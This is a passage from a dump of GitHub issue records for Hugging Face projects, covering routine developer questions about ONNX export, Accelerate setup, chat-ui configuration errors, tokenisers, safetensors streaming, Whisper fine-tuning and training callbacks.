\r\n> I trained model using sentence-transformer. and i add few layers to this model for classification. \r\n> \r\n> and then i want to train model to update all of parameter (including added layers). \r\n> \r\n> but DataLoader cuda() support only tokens_id not text , so first i tokenized text using `model.tokenizer()` .\r\n> \r\n> so, it is already tokenized i need to know how to get embedding if i have token_ids,\r\n\r\nregards\r\n", "url": "https://github.com/huggingface/sentence-transformers/issues/2494", "state": "open", "labels": [], "created_at": "2024-02-20T22:38:18Z", "updated_at": "2024-02-23T10:01:07Z", "user": "sogmgm" }, { "repo": "huggingface/optimum", "number": 1703, "title": "How can I export onnx-model for Qwen/Qwen-7B?", "body": "### Feature request\n\nI need to export the model named qwen to accelerate.\r\n```optimum-cli export onnx --model Qwen/Qwen-7B qwen_optimum_onnx/ --trust-remote-code```\n\n### Motivation\n\nI want to export the model qwen to use onnxruntime\n\n### Your contribution\n\nI can give the input and output.", "url": "https://github.com/huggingface/optimum/issues/1703", "state": "open", "labels": [ "onnx" ], "created_at": "2024-02-20T13:22:08Z", "updated_at": "2024-02-26T13:19:19Z", "comments": 1, "user": "smile2game" }, { "repo": "huggingface/accelerate", "number": 2463, "title": "How to initialize Accelerator twice but with different setup within the same code ? ", "body": "### System Info\n\n```Shell\nHello I want to initialize accelerate once for the training and another time for the inference. \r\n\r\nLooks like it does not work and the error message is not clear. Is there a way to reset the previously initialized accelerate and then initialize with inference setup? \r\n\r\nFor training I am doing : \r\n accelerator = Accelerator(kwargs_handlers=[process_group_kwargs])\r\n model,test_loader, valid_loader, optimizer, scheduler = accelerator.prepare(\r\n model, test_loader, valid_loader, optimizer, scheduler)\r\n\r\nFor inference I want to do: accelerator = Accelerator()\r\nmodel, valid_loader, optimizer = eval_accelerator.prepare(model, valid_loader, optimizer)\r\n\r\nFor inference, I do no want to use optimizer but I get error as I am using zero_stage: 1, So I used the optimizer I used during training. But then I was getting batch size error for the valid set then I prepare the valid loader one more time after initializing the Accelerator. Still during inference I am getting error on the preparation. \r\n\r\nAny idea how to fix this?\n```\n\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\n1. Initialize Accelerator for training \r\n2. Once the training is done, initialize again for the inference. \n\n### Expected behavior\n\nI just want to prepare the accelerate for the inference task once the training is done. ", "url": "https://github.com/huggingface/accelerate/issues/2463", "state": "closed", "labels": [], "created_at": "2024-02-20T13:17:26Z", "updated_at": "2024-03-30T15:06:15Z", "user": "soneyahossain" }, { "repo": "huggingface/chat-ui", "number": 840, "title": "LLama.cpp error - String must contain at least 1 character(s)\"", "body": "I keep getting this error after adding LLAMA-CPP inference endpoint locally. Adding this line causes this error.\r\n\r\n```\r\n \"endpoints\": [\r\n {\r\n \"url\": \"http://localhost:8080\",\r\n \"type\": \"llamacpp\"\r\n }\r\n ]\r\n```\r\nNot sure how to fix it.\r\n```\r\n[\r\n {\r\n \"code\": \"too_small\",\r\n \"minimum\": 1,\r\n \"type\": \"string\",\r\n \"inclusive\": true,\r\n \"exact\": false,\r\n \"message\": \"String must contain at least 1 character(s)\",\r\n \"path\": [\r\n 0,\r\n \"endpoints\",\r\n 0,\r\n \"accessToken\"\r\n ]\r\n }\r\n]\r\nZodError: [\r\n {\r\n \"code\": \"too_small\",\r\n \"minimum\": 1,\r\n \"type\": \"string\",\r\n \"inclusive\": true,\r\n \"exact\": false,\r\n \"message\": \"String must contain at least 1 character(s)\",\r\n \"path\": [\r\n 0,\r\n \"endpoints\",\r\n 0,\r\n \"accessToken\"\r\n ]\r\n }\r\n]\r\n at get error [as error] (file:///C:/Users/SRU/Desktop/chatui/node_modules/zod/lib/index.mjs:538:31)\r\n at ZodArray.parse (file:///C:/Users/SRU/Desktop/chatui/node_modules/zod/lib/index.mjs:638:22)\r\n at C:\\Users\\SRU\\Desktop\\chatui\\src\\lib\\server\\models.ts:75:40\r\n at async instantiateModule (file:///C:/Users/SRU/Desktop/chatui/node_modules/vite/dist/node/chunks/dep-529\r\n```\r\nFull Config:\r\n\r\n```\r\n# Use .env.local to change these variables\r\n# DO NOT EDIT THIS FILE WITH SENSITIVE DATA\r\n\r\nMONGODB_URL=mongodb://localhost:27017/\r\nMONGODB_DB_NAME=chat-ui\r\nMONGODB_DIRECT_CONNECTION=false\r\n\r\nCOOKIE_NAME=hf-chat\r\nHF_TOKEN=#hf_ from from https://huggingface.co/settings/token\r\nHF_API_ROOT=https://api-inference.huggingface.co/models\r\nOPENAI_API_KEY=#your openai api key here\r\n\r\nHF_ACCESS_TOKEN=#LEGACY! Use HF_TOKEN instead\r\n\r\n# used to activate search with web functionality. disabled if none are defined. choose one of the following:\r\nYDC_API_KEY=#your docs.you.com api key here\r\nSERPER_API_KEY=#your serper.dev api key here\r\nSERPAPI_KEY=#your serpapi key here\r\nSERPSTACK_API_KEY=#your serpstack api key here\r\nUSE_LOCAL_WEBSEARCH=#set to true to parse google results yourself, overrides other API keys\r\nSEARXNG_QUERY_URL=# where '' will be replaced with query keywords see https://docs.searxng.org/dev/search_api.html eg https://searxng.yourdomain.com/search?q=&engines=duckduckgo,google&format=json\r\n\r\nWEBSEARCH_ALLOWLIST=`[]` # if it's defined, allow websites from only this list.\r\nWEBSEARCH_BLOCKLIST=`[]` # if it's defined, block websites from this list.\r\n\r\n# Parameters to enable open id login\r\nOPENID_CONFIG=`{\r\n \"PROVIDER_URL\": \"\",\r\n \"CLIENT_ID\": \"\",\r\n \"CLIENT_SECRET\": \"\",\r\n \"SCOPES\": \"\"\r\n}`\r\n\r\n# /!\\ legacy openid settings, prefer the config above\r\nOPENID_CLIENT_ID=\r\nOPENID_CLIENT_SECRET=\r\nOPENID_SCOPES=\"openid profile\" # Add \"email\" for some providers like Google that do not provide preferred_username\r\nOPENID_PROVIDER_URL=https://huggingface.co # for Google, use https://accounts.google.com\r\nOPENID_TOLERANCE=\r\nOPENID_RESOURCE=\r\n\r\n# Parameters to enable a global mTLS context for client fetch requests\r\nUSE_CLIENT_CERTIFICATE=false\r\nCERT_PATH=#\r\nKEY_PATH=#\r\nCA_PATH=#\r\nCLIENT_KEY_PASSWORD=#\r\nREJECT_UNAUTHORIZED=true\r\n\r\n\r\n\r\nMODELS=`[\r\n {\r\n \"name\": \"mistralai/Mistral-7B-Instruct-v0.1\",\r\n \"displayName\": \"mistralai/Mistral-7B-Instruct-v0.1\",\r\n \"description\": \"Mistral 7B is a new Apache 2.0 model, released by Mistral AI that outperforms Llama2 13B in benchmarks.\",\r\n \"chatPromptTemplate\" : \"{{#each messages}}{{#ifUser}}[INST] {{#if @first}}{{#if @root.preprompt}}{{@root.preprompt}}\\n{{/if}}{{/if}}{{content}} [/INST]{{/ifUser}}{{#ifAssistant}}{{content}}{{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 3072,\r\n \"max_new_tokens\": 1024,\r\n \"stop\": [\"\"]\r\n },\r\n \"promptExamples\": [\r\n {\r\n \"title\": \"Write an email from bullet list\",\r\n \"prompt\": \"As a restaurant owner, write a professional email to the supplier to get these products every week: \\n\\n- Wine (x10)\\n- Eggs (x24)\\n- Bread (x12)\"\r\n }, {\r\n \"title\": \"Code a snake game\",\r\n \"prompt\": \"Code a basic snake game in python, give explanations for each step.\"\r\n }, {\r\n \"title\": \"Assist in a task\",\r\n \"prompt\": \"How do I make a delicious lemon cheesecake?\"\r\n }\r\n ],\r\n \"endpoints\": [\r\n {\r\n \"url\": \"http://localhost:8080\",\r\n \"type\": \"llamacpp\"\r\n }\r\n ]\r\n }\r\n]`\r\n\r\nOLD_MODELS=`[]`\r\n\r\nPUBLIC_ORIGIN=#https://huggingface.co\r\nPUBLIC_SHARE_PREFIX=#https://hf.co/chat\r\nPUBLIC_GOOGLE_ANALYTICS_ID=#G-XXXXXXXX / Leave empty to disable\r\nPUBLIC_PLAUSIBLE_SCRIPT_URL=#/js/script.js / Leave empty to disable\r\nPUBLIC_ANNOUNCEMENT_BANNERS=`[\r\n {\r\n \"title\": \"Code Llama 70B is available! \ud83e\udd99\",\r\n \"linkTitle\": \"try it\",\r\n \"linkHref\": \"https://huggingface.co/chat?model=codellama/CodeLlama-70b-Instruct-hf\"\r\n }\r\n]`\r\n\r\nPARQUET_EXPORT_DATASET=\r\nPARQUET_EXP", "url": "https://github.com/huggingface/chat-ui/issues/840", "state": "open", "labels": [ "bug", "models" ], "created_at": "2024-02-19T13:33:24Z", "updated_at": "2024-02-22T14:51:48Z", "comments": 2, "user": "szymonrucinski" }, { "repo": "huggingface/datatrove", "number": 93, "title": "Tokenization for Non English data", "body": "Hi HF team\r\nI want to thank you for this incredible work.\r\nAnd I have a question, I want to apply pipeline of deduplication for Arabic data.\r\n For this I should change the tokenizer I think, And if yes is there a tip for this, \r\nfor this should I just edit the tokenizer here\r\n`class SentenceDedupFilter(PipelineStep):\r\n type = \"\ud83e\udec2 - DEDUPS\"\r\n name = \"\ud83d\udca5 sentence-deduplication stage 3\"\r\n\r\n def __init__(\r\n self,\r\n data_folder: DataFolderLike,\r\n n_sentences: int = 3,\r\n min_doc_words: int = 50,\r\n exclusion_writer: DiskWriter = None,\r\n ):\r\n \"\"\"Args:\r\n data_folder: data folder to get duplicate files.\r\n min_doc_words: min amount of words for each document\r\n \"\"\"\r\n from nltk import load\r\n\r\n super().__init__()\r\n self.data_folder = get_datafolder(data_folder)\r\n self.n_sentences = n_sentences\r\n self.min_doc_words = min_doc_words\r\n **self._tokenizer = load(\"tokenizers/punkt/english.pickle\")**\r\n self.exclusion_writer = exclusion_writer`\r\n \r\n \r\nany recommendations please?\r\nThanks", "url": "https://github.com/huggingface/datatrove/issues/93", "state": "closed", "labels": [ "question" ], "created_at": "2024-02-19T11:02:04Z", "updated_at": "2024-04-11T12:47:24Z", "user": "Manel-Hik" }, { "repo": "huggingface/safetensors", "number": 443, "title": "Efficient key-wise streaming", "body": "### Feature request\r\n\r\nI'm interested in streaming the tensors in a model key by key without having to hold all keys at the same time in memory. Something like this:\r\n\r\n```python\r\nwith safe_open(\"model.safetensors\", framework=\"pt\", device=\"cpu\") as f:\r\n for key in f.keys():\r\n tensor = f.get_tensor(stream=True)\r\n # `tensor` will be garbage collected in the next GC pass\r\n # as soon as the next iteration removes the only reference to it\r\n```\r\n\r\n### Motivation\r\n\r\nWhen I use `safetensors.safe_open` to load multiple models, the memory usage does not drop down even when the deserialized tensors do not have a reference held to them. This is a key by key streamed merge of 5 stable diffusion 1.5 checkpoints using a weighted sum:\r\n\r\n(each vertical gray line is ~8GB)\r\n\r\n![image](https://github.com/huggingface/safetensors/assets/32277961/69bc2e0b-fbe7-4542-99dd-23efb1cbbd23)\r\n\r\nFor reference, this is my successful attempt at reading keys memory efficient in python:\r\nhttps://github.com/ljleb/sd-mecha/blob/9548ef83dd5d3fccdaf09c8b22dee7a0a7727613/sd_mecha/streaming.py#L12\r\n\r\nAnd this is my successful attempt at making writing keys memory efficient:\r\nhttps://github.com/ljleb/sd-mecha/blob/9548ef83dd5d3fccdaf09c8b22dee7a0a7727613/sd_mecha/streaming.py#L156\r\n\r\nWhich looks like this:\r\n\r\n![image](https://github.com/huggingface/safetensors/assets/32277961/ec41da3b-5e30-4d33-8439-68975df4bda2)\r\n\r\nNote that my implementation is relatively slow compared to simply using safetensors directly (approximately 1.1x to 1.3x slower according to some quick test I made). Is there any way the same could be achieved but in a more computationally efficient way using the rust bindings? Specifically, I need to stream the keys and the tensors without them being held somewhere else in memory.\r\n\r\n### Your contribution\r\n\r\nI don't really know Rust but if nobody has time for this and there isn't a problem with my suggested approach to the API above, I will eventually have to implement this efficiently in one way or another for my merging lib.", "url": "https://github.com/huggingface/safetensors/issues/443", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-02-18T23:22:09Z", "updated_at": "2024-04-17T01:47:28Z", "comments": 4, "user": "ljleb" }, { "repo": "huggingface/community-events", "number": 200, "title": "How to prepare audio dataset for whisper fine-tuning with timestamps?", "body": "I am trying to prepare a dataset for whisper fine-tuning , and I have a lot of small segment clip , most of them less than 6 seconds, I read the paper, but didn\u2019t understand this paragraph:\r\n\r\n\u201c When a final transcript segment is only partially included in the current 30- second audio chunk, we predict only its start time token for the segment when in timestamp mode, to indicate that the subsequent decoding should be performed on an audio window aligned with that time, otherwise we truncate the audio to not include the segment\u201d\r\n\r\nSo when should I add the final segment if it is partially included in the current 30-second chunk, and when should I truncate the chunk without it, and if I added it how to extract only relevant transcription?\r\n\r\nTo make it clear:\r\n```\r\n| window | window |\r\n|segment|-----segment---|--segment--|\r\n```\r\nassume that every window is 30 seconds, how to get the correct relevant transcription of the partially included segments?\r\nAnyone could help?", "url": "https://github.com/huggingface/community-events/issues/200", "state": "open", "labels": [], "created_at": "2024-02-18T19:50:33Z", "updated_at": "2024-02-18T19:55:06Z", "user": "omarabb315" }, { "repo": "huggingface/diffusers", "number": 7010, "title": "How to set export HF_HOME on Kaggle?", "body": "Kaggle temporary disk is slow once again and I want models to be downloaded into working directory.\r\n\r\nI have used the below command but it didn't work. Which command I need?\r\n\r\n`!export HF_HOME=\"/kaggle/working\"`\r\n", "url": "https://github.com/huggingface/diffusers/issues/7010", "state": "closed", "labels": [ "bug" ], "created_at": "2024-02-18T11:15:21Z", "updated_at": "2024-02-18T14:39:08Z", "user": "FurkanGozukara" }, { "repo": "huggingface/optimum-benchmark", "number": 126, "title": "How to obtain the data from the 'forward' and 'generate' stages?", "body": "I used the same configuration file to test the model, but the results obtained are different from those of a month ago. In the result files from a month ago, data from both the forward and generate stages were included; however, the current generated result files only contain information from the prefill and decode stages. Here is the configuration file:\r\n\r\ndefaults:\r\n - backend: pytorch # default backend\r\n - launcher: process # default launcher\r\n - benchmark: inference # default benchmark\r\n - experiment # inheriting experiment schema\r\n - _self_ # for hydra 1.1 compatibility\r\n - override hydra/job_logging: colorlog # colorful logging\r\n - override hydra/hydra_logging: colorlog # colorful logging\r\n\r\nexperiment_name: pytorch_qwen7b\r\nmodel: Qwen/Qwen-7B\r\ndevice: cpu\r\n\r\nlauncher:\r\n device_isolation: true\r\n\r\nbenchmark:\r\n memory: true\r\n input_shapes:\r\n batch_size: 1\r\n sequence_length: 256\r\n new_tokens: 1000\r\n\r\nhub_kwargs:\r\n trust_remote_code: true\r\n\r\nhydra:\r\n run:\r\n dir: runs/${experiment_name}\r\n sweep:\r\n dir: sweeps/${experiment_name}\r\n job:\r\n chdir: true\r\n env_set:\r\n OVERRIDE_BENCHMARKS: 1\r\n CUDA_VISIBLE_DEVICES: 0\r\n CUDA_DEVICE_ORDER: PCI_BUS_ID", "url": "https://github.com/huggingface/optimum-benchmark/issues/126", "state": "closed", "labels": [], "created_at": "2024-02-18T09:48:44Z", "updated_at": "2024-02-19T16:06:24Z", "user": "WCSY-YG" }, { "repo": "huggingface/chat-ui", "number": 838, "title": "Explore the possibility for chat-ui to use OpenAI assistants API structure.", "body": "Hi @nsarrazin , I wanted to explore how we could collaborate in making chat-ui more work with OpenAI standards to make it more less opinionated over hosted inference provider. I need it as I am part of a team open-sourcing the GPTs platform https://github.com/OpenGPTs-platform and we will be leveraging chat-ui as the client. So I was hoping we could align our objectives so that we can have a healthy collaboration instead of just diverging. The main point I wanted to touch on is as follows.\r\n\r\nIs there any interest in transforming the backend to one that follows the OpenAI assistants API structure so that we may better align ourselves to the OpenAI standard? Based on the disord \u2060announcement \"...Message API with OpenAI compatibility for HF...\", HF seems to signal that they are pushing in that direction so it would make sense to support that on the chat-ui. I havent looked too deep into the codebase but I imagine we will need to refactor the backend endpoints to support assistants API endpoints and then use the openai client to make the requests.\r\n\r\nI am more than open to suggestions, and I look forward to exploring how we could collab!", "url": "https://github.com/huggingface/chat-ui/issues/838", "state": "open", "labels": [ "enhancement", "good first issue", "back" ], "created_at": "2024-02-17T21:39:49Z", "updated_at": "2024-12-26T05:55:47Z", "comments": 4, "user": "CakeCrusher" }, { "repo": "huggingface/candle", "number": 1720, "title": "How to define custom ops with arbitrary number of tensors ?", "body": "I dived into the issues and repo about the subject, because I wanted to be able to call cuda kernels regarding 3D gaussian splatting, and the way to invoke those kernel seems to be custom ops. But right now, we only have \r\n```\r\nCustomOp1(Tensor, std::sync::Arc>),\r\n\r\nCustomOp2(\r\n Tensor,\r\n Tensor,\r\n std::sync::Arc>,\r\n ),\r\n\r\nCustomOp3(\r\n Tensor,\r\n Tensor,\r\n Tensor,\r\n std::sync::Arc>,\r\n )\r\n```\r\n\r\nAnd those gsplat kernels have way more in and/or out tensors depending on the operation.\r\n\r\nI can think of ways to do it, but I was wondering if there was a _**good**_ way to do it?", "url": "https://github.com/huggingface/candle/issues/1720", "state": "open", "labels": [], "created_at": "2024-02-16T21:38:16Z", "updated_at": "2024-03-13T13:44:17Z", "user": "jeanfelixM" }, { "repo": "huggingface/chat-ui", "number": 837, "title": "Cannot find assistants UI in the repo", "body": "Hi @nsarrazin I recently cloned the chat-ui and I noticed that the new assistants ui is missing, at the very least from the main branch.\r\nIs the assistants ui in the repo somwhere? \r\nIf not is there any plans on making it open-source?\r\n If so when?", "url": "https://github.com/huggingface/chat-ui/issues/837", "state": "closed", "labels": [], "created_at": "2024-02-16T20:13:39Z", "updated_at": "2024-02-17T21:29:08Z", "comments": 4, "user": "CakeCrusher" }, { "repo": "huggingface/dataset-viewer", "number": 2456, "title": "Link to the endpoint doc page in case of error?", "body": "eg. https://datasets-server.huggingface.co/parquet\r\n\r\ncould return\r\n\r\n```json\r\n{\"error\":\"Parameter 'dataset' is required. Read the docs at https://huggingface.co/docs/datasets-server/parquet\"}\r\n```\r\n\r\nor \r\n\r\n```json\r\n{\"error\":\"Parameter 'dataset' is required.\", \"docs\": \"https://huggingface.co/docs/datasets-server/parquet\"}\r\n```\r\n\r\ninstead of\r\n\r\n```json\r\n{\"error\":\"Parameter 'dataset' is required\"}\r\n```", "url": "https://github.com/huggingface/dataset-viewer/issues/2456", "state": "open", "labels": [ "documentation", "question", "api", "P2" ], "created_at": "2024-02-15T11:11:44Z", "updated_at": "2024-02-15T11:12:12Z", "user": "severo" }, { "repo": "huggingface/gsplat.js", "number": 64, "title": "How to render from a set of camera position?", "body": "Hi, I am trying to render the scene from a set of camera position/rotation that I load from a JSON file.\r\n\r\nI think the right way is first to disable the \"orbitControls\" (engine.orbitControls.enabled = false;) and then set the camera position/rotation manually like this: 'camera.data.update(position, rotation);'. Am I right?\r\n\r\nAny suggestion/recommendation is welcome!\r\n", "url": "https://github.com/huggingface/gsplat.js/issues/64", "state": "closed", "labels": [], "created_at": "2024-02-14T16:11:28Z", "updated_at": "2024-02-19T18:13:38Z", "user": "vahidEtt" }, { "repo": "huggingface/chat-ui", "number": 824, "title": "what port is used by the websearch?", "body": "i put the chat in a container in a cluster with my mongodb.\r\nthe web search stopped working, i think it might be related to me not opening a port for the web search to access the web and could not find a doc that describes how the web search works.\r\nwould love to know what port/s i should open and bit more details in general.\r\nthank in advance.", "url": "https://github.com/huggingface/chat-ui/issues/824", "state": "open", "labels": [ "support", "websearch" ], "created_at": "2024-02-14T11:15:22Z", "updated_at": "2024-02-14T12:52:25Z", "user": "kaplanyaniv" }, { "repo": "huggingface/transformers.js", "number": 586, "title": "Does `WEBGPU` Truly Enhance Inference Time Acceleration?", "body": "### Question\n\nRecently, I've been extensively utilizing transformers.js to load transformer models, and Kudos to the team for this wonderful library ...\r\nSpecifically, I've been experimenting with version 2.15.0 of transformers.js.\r\n\r\n\r\n\r\nDespite the fact that the model runs on the `web-assembly backend`, I've noticed some slowness in inference. In an attempt to address this issue, I experimented with` webgpu inference` using the `v3` branch. However, the inference time did not meet my expectations.\r\n\r\nIs it possible for webgpu to significantly accelerate the inference time?", "url": "https://github.com/huggingface/transformers.js/issues/586", "state": "closed", "labels": [ "question" ], "created_at": "2024-02-14T09:23:52Z", "updated_at": "2024-10-18T13:30:13Z", "user": "kishorekaruppusamy" }, { "repo": "huggingface/chat-ui", "number": 823, "title": "WebSearch uses the default model instead of current model selected", "body": "I have multiple models in my .env.local and it seems the WebSearch uses the default model to perform its search content extraction instead of the currently selected model (the one that I'm asking the question to...) Is it possible to add a config option to use same model for everything?", "url": "https://github.com/huggingface/chat-ui/issues/823", "state": "open", "labels": [ "enhancement", "back", "models" ], "created_at": "2024-02-14T07:52:59Z", "updated_at": "2024-02-14T13:07:20Z", "comments": 4, "user": "ihubanov" }, { "repo": "huggingface/trl", "number": 1327, "title": "how to save/load model?", "body": "I've tried save model via:\r\n\r\nppo_trainer.save_pretrained(\"./model_after_rl\")\r\n\r\nand load the model via:\r\n\r\nmodel = AutoModelForCausalLMWithValueHead.from_pretrained(\"./model_after_rl\")\r\nref_model = AutoModelForCausalLMWithValueHead.from_pretrained(\"./model_after_rl\")\r\n\r\nBut the performance is same to without any reinforcement learning, when I add the loaded model to a new PPO trainer, freeze the model and test again. \r\n\r\n", "url": "https://github.com/huggingface/trl/issues/1327", "state": "closed", "labels": [], "created_at": "2024-02-14T06:56:07Z", "updated_at": "2024-04-24T15:05:14Z", "user": "ADoublLEN" }, { "repo": "huggingface/accelerate", "number": 2440, "title": "How to properly gather results of PartialState for inference on 4xGPUs", "body": "### System Info\r\n\r\n```Shell\r\ntorch==2.2.0\r\ntransformers==4.37.2\r\naccelerate==0.27.0\r\n```\r\n\r\n\r\n### Information\r\n\r\n- [X] The official example scripts\r\n- [X] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\r\n- [X] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\nHi, my question may look like stupid but I want to ask for clarification, because I didn't find it in [documentation](https://huggingface.co/docs/accelerate/main/en/usage_guides/distributed_inference#sending-chunks-of-a-batch-automatically-to-each-loaded-model) \r\n\r\nI have 2 million documents to process with ner model. And also I have 4 GPU. I don't wanna write script with multiprocess and manually handle each gpu. I decided to try use accelerate. \r\n\r\n```python\r\n# Assume there are two processes\r\nfrom accelerate import PartialState\r\nfrom transformers import AutoTokenizer, AutoModelForTokenClassification, pipeline\r\n\r\nmodel = AutoModelForTokenClassification.from_pretrained('ner')\r\ntokenizer = AutoTokenizer.from_pretrained('ner')\r\n\r\nner = pipeline('token-classification', model=model, tokenizer=tokenizer, aggregation_strategy=\"simple\")\r\n\r\nstate = PartialState()\r\nner.to(state)\r\n\r\n# here the list of the list, I wanna treat like a list of batches\r\ndata = [[{'text': 'text1', 'id': 1}, {'text': 'text2', 'id': 2}], [{'text': 'text3', 'id': 3}, {'text': 'text4', 'id': 4}] ] \r\n\r\nresults = []\r\nwith state.split_between_processes(data) as inputs:\r\n output = ner([i['text'] for i in inputs], max_length=128)\r\n \r\n for i, o in zip(inputs, outputs):\r\n i['annotation'] = o\r\n results.append(i)\r\n```\r\n\r\nAnd my question is: Am I properly gather results or it could be problems because its distributed between different process.\r\n\r\nHow to properly gather results when use `split_between_processes`?\r\n\r\n### Expected behavior\r\n\r\nDocumentation will have more examples how to gather data.", "url": "https://github.com/huggingface/accelerate/issues/2440", "state": "closed", "labels": [], "created_at": "2024-02-13T14:00:13Z", "updated_at": "2024-03-23T15:07:26Z", "user": "ZeusFSX" }, { "repo": "huggingface/chat-ui", "number": 818, "title": "Settings Page Freezes", "body": "When I go to settings to change model (after I ran a convo with a model), the UI settings page can't be closed. It freezes. Right now I have to keep reloading the page to use it", "url": "https://github.com/huggingface/chat-ui/issues/818", "state": "closed", "labels": [ "question", "support" ], "created_at": "2024-02-13T13:30:01Z", "updated_at": "2024-02-16T09:41:23Z", "user": "lordsoffallen" }, { "repo": "huggingface/candle", "number": 1701, "title": "How to train my own YOLOv8 model?", "body": "Candle provides an example of YOLOv8, which is very useful to use.\r\nBut I don't know how to train on my own dataset? Can handle directly load the model trained by pytorch?", "url": "https://github.com/huggingface/candle/issues/1701", "state": "open", "labels": [], "created_at": "2024-02-13T01:56:49Z", "updated_at": "2024-03-18T13:45:07Z", "user": "mzdk100" }, { "repo": "huggingface/transformers.js", "number": 585, "title": "Using a server backend to generate masks - doublelotus", "body": "### Question\r\n\r\nHi there, just continuing on from my question on - https://huggingface.co/posts/Xenova/240458016943176#65ca9d9c8e0d94e48742fad7. \r\n\r\nI've just been reading through your response and initially I was trying it using a python backend and attempted to mimic the worekr.js code like so:\r\n\r\n```py\r\nfrom transformers import SamModel, SamProcessor, AutoProcessor\r\nimport numpy as np\r\n\r\nmodel = SamModel.from_pretrained(\"Xenova/sam-vit-large\")\r\nprocessor = AutoProcessor.from_pretrained(\"Xenova/sam-vit-large\")\r\n```\r\nbut was running into this error (as I'm assuming that model isn't supported for a python backend\r\nOSError: Xenova/sam-vit-large does not appear to have a file named pytorch_model.bin, tf_model.h5, model.ckpt or flax_model.msgpack.\r\n\r\nThe main reason behind trying this is because when I tried with sam-vit-base on the web app it was quite slow in generating the image embeddings, would using a node.js server to do that with the onnx server as you suggested be much faster or is there a better way to achieve that?", "url": "https://github.com/huggingface/transformers.js/issues/585", "state": "open", "labels": [ "question" ], "created_at": "2024-02-13T00:06:20Z", "updated_at": "2024-02-28T19:29:26Z", "user": "jeremiahmark" }, { "repo": "huggingface/chat-ui", "number": 817, "title": "Question: Can someone explain \"public app data sharing with model authors\" please?", "body": "I am struggling to understand in which way data can or is actually shared with whom when the setting `shareConversationsWithModelAuthors` is activated (which it is by default)?\r\n```javascript\r\n{#if PUBLIC_APP_DATA_SHARING === \"1\"}\r\n\t\r\n\t

\r\n\t\t\tShare conversations with model authors\r\n\t\t
\r\n\t\r\n\r\n\t

\r\n\t\tSharing your data will help improve the training data and make open models better over time.\r\n\t

\r\n{/if}\r\n```\r\n\r\nWhat exactly will or can happen when this is activated?\r\nThanks!", "url": "https://github.com/huggingface/chat-ui/issues/817", "state": "closed", "labels": [ "question" ], "created_at": "2024-02-12T19:18:03Z", "updated_at": "2024-02-16T14:32:18Z", "user": "TomTom101" }, { "repo": "huggingface/transformers.js", "number": 581, "title": "How can we use the sam-vit-huge in the production?", "body": "### Question\n\nThe size of ONNX files for sam-vit-huge is around 600MB. If I am using the implementation mentioned in the documentation, it downloads these files first before performing the image segmentation. Is there a better way to avoid downloading these files and reduce the time it takes? Additionally, the model is taking too much time to generate embeddings when using sam-vit-huge or sam-vit-large.", "url": "https://github.com/huggingface/transformers.js/issues/581", "state": "open", "labels": [ "question" ], "created_at": "2024-02-09T17:54:43Z", "updated_at": "2024-02-09T17:54:43Z", "user": "moneyhotspring" }, { "repo": "huggingface/dataset-viewer", "number": 2434, "title": "Create a new step: `config-features`?", "body": "See https://github.com/huggingface/datasets-server/issues/2215: the `features` part can be heavy, and on the Hub, when we call /rows, /filter or /search, the features content does not change; there is no need to create / serialize / transfer / parse it.\r\n\r\nWe could:\r\n- add a new /features endpoint\r\n- or add a `features: bool` parameter to all the endpoints that return rows to include the features in the response.\r\n\r\nThe only exception is when a new commit happens, and the features have changed. But the Hub could check the `X-Revision` value and reload the page in case of a mismatch.", "url": "https://github.com/huggingface/dataset-viewer/issues/2434", "state": "open", "labels": [ "question", "refactoring / architecture", "P2" ], "created_at": "2024-02-09T14:13:10Z", "updated_at": "2024-02-15T10:26:35Z", "user": "severo" }, { "repo": "huggingface/diffusers", "number": 6920, "title": "How to merge a lot of embedding into a single file ", "body": "I create a lot of embedding through textual inversion, but I couldn't found a file to merge this ckpt\r\n", "url": "https://github.com/huggingface/diffusers/issues/6920", "state": "open", "labels": [ "stale" ], "created_at": "2024-02-09T08:18:42Z", "updated_at": "2024-03-13T15:02:51Z", "user": "Eggwardhan" }, { "repo": "huggingface/transformers", "number": 28924, "title": "How to disable log history from getting printed every logging_steps", "body": "I'm writing a custom ProgressCallback that modifies the original ProgressCallback transformers implementation and adds some additional information/data to the tqdm progress bar. Here's what I have so far, and it works nicely and as intended.\r\n\r\n```python\r\nclass ProgressCallback(TrainerCallback):\r\n \"\"\"A [`TrainerCallback`] that displays the progress of training or evaluation.\r\n\r\n Specifically, it shows:\r\n 1. Time spent so far in training or evaluation.\r\n 2. Estimated time remaining for training or evaluation.\r\n 3. Iterations per second.\r\n 4. Loss.\r\n 5. Number of input tokens seen so far.\r\n \"\"\"\r\n\r\n def __init__(self):\r\n self.training_bar = None\r\n self.prediction_bar = None\r\n self.current_step: int = 0\r\n self.loss: float = math.nan\r\n self.num_input_tokens_seen = format_number_suffix(0)\r\n\r\n def on_train_begin(self, args, state, control, **kwargs):\r\n if state.is_world_process_zero:\r\n self.training_bar = tqdm(total=state.max_steps, dynamic_ncols=True)\r\n\r\n def on_step_end(self, args, state, control, **kwargs):\r\n if state.is_world_process_zero:\r\n self.training_bar.update(state.global_step - self.current_step)\r\n self.current_step = state.global_step\r\n\r\n def on_prediction_step(self, args, state, control, eval_dataloader=None, **kwargs):\r\n if state.is_world_process_zero and has_length(eval_dataloader):\r\n if self.prediction_bar is None:\r\n self.prediction_bar = tqdm(\r\n total=len(eval_dataloader),\r\n leave=self.training_bar is None,\r\n dynamic_ncols=True,\r\n )\r\n self.prediction_bar.update(1)\r\n\r\n def on_evaluate(self, args, state, control, **kwargs):\r\n if state.is_world_process_zero:\r\n if self.prediction_bar is not None:\r\n self.prediction_bar.close()\r\n self.prediction_bar = None\r\n\r\n def on_predict(self, args, state, control, **kwargs):\r\n if state.is_world_process_zero:\r\n if self.prediction_bar is not None:\r\n self.prediction_bar.close()\r\n self.prediction_bar = None\r\n\r\n def on_log(self, args, state, control, logs=None, 